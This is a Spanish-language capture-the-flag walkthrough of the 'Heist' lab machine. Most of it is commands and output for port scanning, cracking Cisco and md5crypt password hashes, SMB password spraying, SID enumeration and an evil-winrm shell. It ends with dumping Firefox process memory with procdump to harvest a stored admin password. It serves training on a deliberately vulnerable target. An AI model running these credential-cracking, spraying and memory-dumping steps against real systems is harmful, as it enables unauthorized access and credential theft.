Heist [EASY🟢]

Dificultad: Fácil

1- Reconocimiento y escaneo

`1.1 Ping`

ping -c 1 10.10.10.149

❯ ping -c 1 10.10.10.149
PING 10.10.10.149 (10.10.10.149) 56(84) bytes of data.
64 bytes from 10.10.10.149: icmp_seq=1 ttl=127 time=172 ms

--- 10.10.10.149 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 171.839/171.839/171.839/0.000 ms

Podemos notar que se trata de una maquina Windows, debido al TTL:

TTL <= 64 >>(Linux)
TTL <= 128 >> (Windows)

`1.2 Nmap`

nmap -sS -sCV -p- --min-rate 5000 -n -Pn -vvv 10.10.10.149 -oN escaneo.txt

❯ nmap -sS -sCV -p- --min-rate 5000 -n -Pn -vvv 10.10.10.149 -oN escaneo.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-09 21:23 -03
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating SYN Stealth Scan at 21:23
Scanning 10.10.10.149 [65535 ports]
Discovered open port 135/tcp on 10.10.10.149
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49669/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Completed SYN Stealth Scan at 21:24, 26.53s elapsed (65535 total ports)
Initiating Service scan at 21:24
Scanning 5 services on 10.10.10.149
Completed Service scan at 21:25, 56.49s elapsed (5 services on 1 host)
NSE: Script scanning 10.10.10.149.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
NSE Timing: About 99.86% done; ETC: 21:25 (0:00:00 remaining)
Completed NSE at 21:25, 40.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.76s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.01s elapsed
Nmap scan report for 10.10.10.149
Host is up, received user-set (0.17s latency).
Scanned at 2025-03-09 21:23:40 -03 for 124s
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48515/tcp): CLEAN (Timeout)
|   Check 2 (port 7618/tcp): CLEAN (Timeout)
|   Check 3 (port 25486/udp): CLEAN (Timeout)
|   Check 4 (port 14421/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 1m58s
| smb2-time: 
|   date: 2025-03-10T00:27:04
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:25
Completed NSE at 21:25, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.61 seconds
           Raw packets sent: 131083 (5.768MB) | Rcvd: 23 (1.012KB)

Tenemos el puerto 80(Microsoft IIS 10.0) correspondiente a un servidor web, puerto 135 y 139, puertos comunes en Windows, y por ultimo y interesante, el puerto 5985, con este puerto en la fase de explotación y escalado de privilegios podremos conectarnos mediante "evil-winrm"

`1.3 whatweb`

❯ whatweb 10.10.10.149
http://10.10.10.149 [302 Found] Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.149], Microsoft-IIS[10.0], PHP[7.3.1], RedirectLocation[login.php], X-Powered-By[PHP/7.3.1]
http://10.10.10.149/login.php [200 OK] Bootstrap[3.3.7], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.10.10.149], JQuery[3.1.1], Microsoft-IIS[10.0], PHP[7.3.1], PasswordField[login_password], Script, Title[Support Login Page], X-Powered-By[PHP/7.3.1]

Vemos tecnologias web como:

Boostrap 3.3.7
Microsoft  IIS 10.0
JQuery 3.1.1
PHP 7.3.1

Podemos ingresar al sitio web como invitado

`1.4 crackmapexec`

❯ crackmapexec smb 10.10.10.149
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)

2- Explotación

`2.1 Cisco Type 7 Password y John The Ripper`

Vamos a ingresar al sitio web como invitado:

Tenemos un archivo adjunto en el post del usuario "Hazard" que esta preguntando por su router CISCO, vamos a ver que contiene:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

Podemos ver posibles credenciales:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

Tenemos usuarios tambien(Incluyendo el usuario "Hazard" que fue el que posteo con el archivo adjunto):

rout3r   0242114B0E143F015F5D1E161713
admin    02375012182C1A1D751618034F36415408
Hazard
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

Vamos a probar crackear estas contraseñas, este hash es un hash que utiliza Cisco en sus router, Cisco lo conoce como hash de tipo 7, tenemos varios sitios webs para crackear estos hashes, en mi caso utilizare la siguiente:

Cisco Type 7 Password Decrypter

Voy a pasarle la contraseña del usuario "rout3r":

Y ahora la del usuario admin:

De tal manera que:

rout3r   $uperP@ssword
admin    Q4)sJu\Y8qz*A3?d
Hazard
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

Tambien tenemos un hash en la siguiente linea:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

Parece ser un hash MD5, asi que vamos a almacenarlo en un archivo de texto para posteriormente crackearlo con John The Ripper

❯ nvim hash_secret
❯ cat hash_secret
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: hash_secret
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ $1$pdQG$o8nrSzsGXeaduXrjlvKc91
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Y ahora vamos a crackearlo con John The Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt hash_secret

(En mi caso utilizare rockyou como diccionario)

❯ john --wordlist=/usr/share/wordlists/rockyou.txt hash_secret
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent    (?)     
1g 0:00:00:43 DONE (2025-03-09 22:32) 0.02316g/s 81217p/s 81217c/s 81217C/s stealthy001..steak7893
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Y ahora la lista de usuarios y contraseñas quedaria de la siguiente forma:

rout3r                $uperP@ssword
admin                Q4)sJu\Y8qz*A3?d
Hazard
                       stealth1agent

Vamos a almacenar los usuarios por un lado en un archivo de texto y de igual manera para las contraseñas:

❯ nvim users
❯ nvim passwords
❯ cat users
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: users
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ rout3r
   2   │ admin
   3   │ Hazard
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ cat passwords
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: passwords
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ $uperP@ssword
   2   │ Q4)sJu\Y8qz*A3?d
   3   │ stealth1agent
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

`2.2 Fuerza bruta con crackmapexec a SMB`

Ahora con estas credenciales potenciales, vamos a utilizar crackmapexec para verificar si algunos de estos usuarios coinciden con las contraseñas anteriormente crackeadas para el servicio SMB que esta corriendo por el puerto 445:

crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success

(El parámetro "--continue-on-success" es para que cuando detecte unas credenciales validas no se detenga)

❯ crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent

Tenemos unas credenciales validas:

Usuario: Hazard
Password: stealth1agent

`2.3 impacket-lookupsid`

Luego de intentar las credenciales validas y incluso de listar los recursos compartidos con las credenciales del usuario "hazard" para ver los permisos, no encontré nada interesante, asi que di por sentado que ninguna de las credenciales es valida, asi que vamos a enumerar usuarios de la maquina Windows, mediante el servicio SMB con la herramienta "impacket-lookupsid"

impacket-lookupsid SUPPORTDESK/hazard:stealth1agent@10.10.10.149

Primero le especificamos el nombre de la maquina "SUPPORTDESK" que vimos en la fase de reconocimiento y escaneo con la herramienta crackmapexec, luego el usuario y la contraseña y por ultimo la dirección IP

❯ impacket-lookupsid SUPPORTDESK/hazard:stealth1agent@10.10.10.149
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

Vemos 3 usuarios interesantes:

support
Chase
Jason

Asi que vamos a agregarlos al archivo de texto "users" previamente creado para volver a utilzar crackmapexec y realizar fuerza bruta:

❯ nvim users
❯ cat users
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: users
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ rout3r
   2   │ admin
   3   │ Hazard
   4   │ support
   5   │ Chase
   6   │ Jason
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

Y volvemos a utilizar el mismo comando de antes con crackmapexec:

crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success

❯ crackmapexec smb 10.10.10.149 -u users -p passwords --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE

Y ahora tambien tenemos las credenciales del usuario "Chase":

Usuario: Chase
Contraseña: Q4)sJu\Y8qz*A3?d

Vamos a validar con crackmapexec si las credenciales son validas y si nos da como resultado al final de la validación (PWN3D!), podremos conectarnos mediante "evil-winrm", debido a que el puerto 5985 se encuentra abierto y si el usuario pertenece al grupo de "Remote Management Users":

crackmapexec winrm 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

❯ crackmapexec winrm 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
SMB         10.10.10.149    5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
HTTP        10.10.10.149    5985   SUPPORTDESK      [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)

Podemos conectarnos mediante "evil-winrm"

`2.4 Shell con evil-winrm`

Vamos a conectarnos con "evil-winrm" con las credenciales obtenidas del usuario "Chase":

evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'

❯ evil-winrm -i 10.10.10.149 -u 'Chase' -p 'Q4)sJu\Y8qz*A3?d'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>

`2.5 Obtención de la flag user`

La flag de user se encuentra dentro de la ruta absoluta "C:\Users\Chase\Desktop\user.txt":

*Evil-WinRM* PS C:\Users\Chase\Documents> type "C:\Users\Chase\Desktop\user.txt"
b3d11a2c5f909fbefe85146fbb5279af
*Evil-WinRM* PS C:\Users\Chase\Documents>

Si ejecutamos "net user Chase", veremos que se encuentra dentro del grupo "Remote Management Users":

*Evil-WinRM* PS C:\Users\Chase\Documents> net user Chase
User name                    Chase
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/22/2019 8:20:32 AM
Password expires             Never
Password changeable          4/22/2019 8:20:32 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/10/2025 7:33:57 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users  <-------
Global Group memberships     *None
The command completed successfully.

*Evil-WinRM* PS C:\Users\Chase\Documents>

3- Escalado de privilegios

`3.1 procdump64 (Volcado de datos de un proceso en Windows)`

Vamos a listar los procesos que se encuentran activos dentro de la maquina:

*Evil-WinRM* PS C:\Users\Chase\Documents> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    459      18     2304       5460               372   0 csrss
    290      13     2280       5196               484   1 csrss
    357      15     3444      14352              5056   1 ctfmon
    254      14     4012      13416              3764   0 dllhost
    166       9     1884       9600       0.05   6776   1 dllhost
    617      32    29992      58148               972   1 dwm
   1493      58    23916      78744              4408   1 explorer
    355      25    16396      38828       0.06   5860   1 firefox
   1069      70   151636     228032       5.91   6472   1 firefox
    347      19    10196      38592       0.08   6588   1 firefox
    401      34    32292      92632       0.98   6712   1 firefox
    378      28    22424      58984       0.48   7000   1 firefox
     49       6     1788       4592               784   1 fontdrvhost
     49       6     1516       3856               792   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    968      22     5668      14724               632   0 lsass
    223      13     3060      10204              3740   0 msdtc
      0      12      412      15300                88   0 Registry
    145       8     1608       7248              5504   1 RuntimeBroker
    302      16     5584      16956              5568   1 RuntimeBroker
    276      14     3080      14848              5976   1 RuntimeBroker
    675      32    19836      62028              5404   1 SearchUI
    538      11     5268       9856               616   0 services
    706      29    15264      52236              5304   1 ShellExperienceHost
    437      17     4740      23820              4748   1 sihost
     53       3      524       1160               268   0 smss
    471      22     5800      16244              2344   0 spoolsv
    286      13     5364      11976                64   0 svchost
    115       7     1236       5168               468   0 svchost
    199      12     1976       9316               488   0 svchost
    149       9     1712      11376               700   0 svchost
     85       5      876       3784               740   0 svchost
    861      20     6924      22256               760   0 svchost
    854      16     4996      11536               872   0 svchost
    254      11     1996       7436               920   0 svchost
    249      14     3076      13668               968   0 svchost
    377      13    10768      14616              1032   0 svchost
    223      11     2804      10848              1048   0 svchost
    140       7     1300       5576              1132   0 svchost
    123      15     3316       7192              1200   0 svchost
    211       9     2140       7392              1232   0 svchost
    184       9     1772       7380              1252   0 svchost
    228      12     2576      11180              1260   0 svchost
    431       9     2836       8908              1276   0 svchost
    154       7     1208       5516              1292   0 svchost
    127       7     1564       6212              1308   0 svchost
    170      10     1764       7864              1384   0 svchost
    339      13     4276      11492              1424   0 svchost
    238      11     2432       9616              1440   0 svchost
    368      18     4960      14020              1456   0 svchost
    243      13     3240       8388              1472   0 svchost
    302      11     2004       8636              1480   0 svchost
    321      10     2448       8248              1564   0 svchost
    191      12     2048      11828              1576   0 svchost
    163      10     2348       7344              1628   0 svchost
    396      31     8756      16812              1716   0 svchost
    194      11     2000       8096              1816   0 svchost
    160       8     2076       7188              1864   0 svchost
    479      20    12680      27052              2424   0 svchost
    261      13     2556       7764              2432   0 svchost
    400      16    10956      19876              2440   0 svchost
    179      22     2496       9712              2448   0 svchost
    166      12     3916      10692              2456   0 svchost
    133       9     1632       6484              2528   0 svchost
    136       8     1424       6040              2548   0 svchost
    126       8     1228       5264              2588   0 svchost
    205      11     2292       8272              2596   0 svchost
    209      12     1864       7368              2656   0 svchost
    231      14     4628      11692              2704   0 svchost
    267      19     3244      12112              2712   0 svchost
    168      10     2152      13160              2724   0 svchost
    462      16     3280      11616              2832   0 svchost
    381      23     3344      12120              3060   0 svchost
    353      19    14920      31468              4064   0 svchost
    162       9     4252      12032              4292   0 svchost
    230      12     3088      13504              4760   1 svchost
    371      18     5584      26912              4784   1 svchost
    210      11     2860      11820              4964   0 svchost
    171       9     1492       7232              4996   0 svchost
    193      15     6024       9996              5356   0 svchost
    167      11     2356      12972              5804   0 svchost
    163       9     3036       7596              5816   0 svchost
    309      16    14516      16640              6188   0 svchost
    312      20     9200      14236              6316   0 svchost
    122       7     1212       5508              6420   0 svchost
    254      13     3396      12628              7052   0 svchost
   1889       0      188        136                 4   0 System
    206      20     3776      11852              5016   1 taskhostw
    167      11     2900      10904              2632   0 VGAuthService
    142       8     1684       6864              2668   0 vm3dservice
    136       9     1812       7368              3104   1 vm3dservice
    383      22     9536      21932              2640   0 vmtoolsd
    236      18     5080      15004              6200   1 vmtoolsd
    171      11     1452       6868               476   0 wininit
    280      13     2812      12724               540   1 winlogon
    350      16     8592      18268              3980   0 WmiPrvSE
   1737      27    77640      95040       0.95   4452   0 wsmprovhost

Podemos ver que dentro de la maquina se encuentra el Firefox abierto:

    355      25    16396      38828       0.06   5860   1 firefox
   1069      70   151636     228032       5.91   6472   1 firefox
    347      19    10196      38592       0.08   6588   1 firefox
    401      34    32292      92632       0.98   6712   1 firefox
    378      28    22424      58984       0.48   7000   1 firefox

Con los PIDs 5860, 6472, 6588, 6712 y 7000, en mi caso utilizare el PID 5860

Para hacer un volcado de datos, vamos a utilizar la herramienta "procdump64", ya que si recordamos en la fase de reconocimiento y escaneo con crackmapexec, la maquina era de 64 bits

ProcDump Download

Nos descargara un archivo .ZIP

❯ ls
 lab_ttomiid.ovpn   Procdump.zip

Vamos a descomprimirlo en el directorio donde hayamos dejado la ultima vez que nos conectamos con "evil-winrm":

❯ mv Procdump.zip /home/t0mz/CTF/heist/content
❯ cd /home/t0mz/CTF/heist/content
❯ ls
 hash_secret   passwords   Procdump.zip   users
❯ unzip Procdump.zip
Archive:  Procdump.zip
  inflating: procdump.exe            
  inflating: procdump64.exe          
  inflating: procdump64a.exe         
  inflating: Eula.txt                
❯ ls
 Eula.txt   hash_secret   passwords   procdump.exe   Procdump.zip   procdump64.exe   procdump64a.exe   users

En nuestro caso, como mencione anteriormente nos interesa concretamente el archivo "procdump64.exe", asi que vamos a subirlo a la maquina con el comando "upload" que viene integrado a la herramienta de "evil-winrm":

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload /home/t0mz/CTF/heist/content/procdump64.exe
                                        
Info: Uploading /home/t0mz/CTF/heist/content/procdump64.exe to C:\Users\Chase\Desktop\procdump64.exe
                                        
Data: 566472 bytes of 566472 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir 


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/10/2025   8:07 AM         424856 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        3/10/2025   5:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop>

Vamos a ejecutarlo con el siguiente comando:

.\procdump64.exe -accepteula -ma 5860

*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump64.exe -accepteula -ma 5860

ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[08:08:20] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.exe_250310_080820.dmp
[08:08:20] Dump 1 writing: Estimated dump file size is 298 MB.
[08:08:23] Dump 1 complete: 298 MB written in 3.1 seconds
[08:08:24] Dump count reached.

*Evil-WinRM* PS C:\Users\Chase\Desktop> dir


    Directory: C:\Users\Chase\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/10/2025   8:08 AM      304638365 firefox.exe_250310_080820.dmp
-a----        3/10/2025   8:07 AM         424856 procdump64.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        3/10/2025   5:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\Chase\Desktop>

Nos creo el volcado de datos del PID 5860, correspondiente al Firefox que se encuentra abierto en la maquina(firefox.exe_250310_080820.dmp)

Y ahora para bajarnos ese archivo y visualizarlo como binario con el comando "strings", vamos a utilizar el comando "download":

*Evil-WinRM* PS C:\Users\Chase\Desktop> download firefox.exe_250310_080820.dmp
                                        
Info: Downloading C:\Users\Chase\Desktop\firefox.exe_250310_080820.dmp to firefox.exe_250310_080820.dmp
Progress: 0% : |▒░░░░░░░░░░|

Aunque esto va a tardar mucho, asi que mientras se va descargando y aumentando el tamaño del archivo, vamos a ir visualizandolo con "strings" y aplicando un "grep" a la palabra clave "password":

strings firefox.exe_250310_080820.dmp | grep password

❯ strings firefox.exe_250310_080820.dmp | grep password
security.ask_for_password
services.sync.engine.passwords.validation.percentageChance
security.insecure_password.ui.enabled
urlclassifier.passwordAllowTable
editor.password.testing.mask_delay
services.sync.engine.passwords.validation.interval
security.password_lifetime
editor.password.mask_delay
browser.safebrowsing.passwords.enabled
services.sync.engine.passwords
privacy.cpd.passwords
services.sync.engine.passwords.validation.maxRecords
goog-badbinurl-proto,goog-downloadwhite-proto,goog-phish-proto,googpub-phish-proto,goog-malware-proto,goog-unwanted-proto,goog-harmful-proto,goog-passwordwhite-proto
goog-passwordwhite-proto
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
chrome://passwordmgr/content/recipes.json
goog-downloadwhite-digest256,base-track-digest256,mozstd-trackwhite-digest256,content-track-digest256,mozplugin-block-digest256,mozplugin2-block-digest256,block-flash-digest256,except-flash-digest256,allow-flashallow-digest256,except-flashallow-digest256,block-flashsubdoc-digest256,except-flashsubdoc-digest256,goog-passwordwhite-proto,ads-track-digest256,social-track-digest256,analytics-track-digest256,base-fingerprinting-track-digest256,content-fingerprinting-track-digest256,base-cryptomining-track-digest256,content-cryptomining-track-digest256,fanboyannoyance-ads-digest256,fanboysocial-ads-digest256,easylist-ads-digest256,easyprivacy-ads-digest256,adguard-ads-digest256,social-tracking-protection-digest256,social-tracking-protection-facebook-digest256,social-tracking-protection-linkedin-digest256,social-tracking-protection-twitter-digest256
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
RG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localization/en-US/toolkit/passwordmgr/passwordManagerList.ftlPK
modules/services-sync/engines/passwords.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.jsPK
chrome/toolkit/content/passwordmgr/passwordManager.xulPK
chrome/toolkit/content/passwordmgr/recipes.jsonPK
chrome/toolkit/skin/classic/global/passwordmgr.cssPK
chrome/pippki/content/pippki/changepassword.jsPK
chrome/pippki/content/pippki/changepassword.xhtmlPK
chrome/pippki/content/pippki/resetpassword.jsPK
chrome/pippki/content/pippki/resetpassword.xhtmlPK
chrome/pippki/content/pippki/setp12password.jsPK
chrome/pippki/content/pippki/setp12password.xhtmlPK
chrome/en-US/locale/en-US/passwordmgr/passwordmgr.propertiesPK
pref("security.ask_for_password",        0);
pref("security.password_lifetime",       30);
